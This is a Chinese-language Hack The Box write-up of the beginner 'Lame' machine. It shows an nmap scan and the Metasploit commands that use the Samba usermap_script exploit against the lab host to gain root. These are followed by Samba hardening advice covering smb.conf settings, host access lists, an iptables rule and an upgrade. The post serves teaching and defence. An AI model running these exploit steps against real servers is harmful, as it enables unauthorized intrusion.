【HTB系列】 Lame

出品｜MS08067实验室（www.ms08067.com)

本文作者：shavchen

01 前言

这次挑战的靶机是Lame，距今900天+，历史感十足

靶机描述

Lame is a beginner level machine, requiring only one exploit to obtain root access.

It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

技能收获：Smaba漏洞利用

02 信息收集

基本信息

Kali ip ：10.10.14.3

Lameip：10.10.10.3

通信正常，延时偏高

端口扫描

nmap -sV -A -p- 10.10.10.3

啊，Samba

03 漏洞利用

靶机开启了Smaba服务，那还有什么好说的

search Samba

选择exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script
set rhosts 10.10.10.3
exploit

emem，至此完成？靶机简单，那我们加固一下吧

04 安全加固

查看samba版本

修改配置文件，位置：/etc/samba/smb.conf

1. 不使用明文密码

#加入参数
encrypt passwords=yes
smb passwd file=/etc/samba/smbpasswd

这样，当security=user时，通过/etc/samba/smbpasswd文件进行验证，验证过程无明码传输

1. 不使用共享级别的安全
   
   当security=share的时候，samba安全性比较差，灵活性不强，所以应避免使用共享级别安全

2. 限制网络接口访问
   
   这个适用于多网卡用户，限制samba只响应来自内网的用户请求

interfaces=192.168.1.1/24 127.0.0.1
bind interfaces only=yes

1. 控制访问列表

#ip控制
hosts deny=ALL
hosts allow=192.168.1.0/24 127.0.0.1
#主机控制
hosts deny=ALL
hosts allow=win01,win02,win05
#用户控制,允许用户smb01,smb02与组samba,admin访问
valid users=smb01,smb02,@samba@admin

1. 配置iptables
   
   samba经常被配置在有双网卡的机器上，samba做为内网专用服务，应该隔绝外网以保护samba,这里可以使用iptables封锁以下端口，不允许外网访问137，138，139端口！

iptables -t filter -A INPUT  -p tcp --dport 139 -j DROP

1. 升级samba版本

apt-get install samba

 

 

 

转载请联系作者并注明出处！

Ms08067安全实验室专注于网络安全知识的普及和培训。团队已出版《Web安全攻防：渗透测试实战指南》，《内网安全攻防：渗透测试实战指南》，《Python安全攻防：渗透测试实战指南》，《Java代码安全审计（入门篇）》等书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货，从零开始、以实战落地为主，致力于做一个实用的干货分享型公众号。

官方网站：https://www.ms08067.com/

扫描下方二维码加入实验室VIP社区

加入后邀请加入内部VIP群，内部微信群永久有效！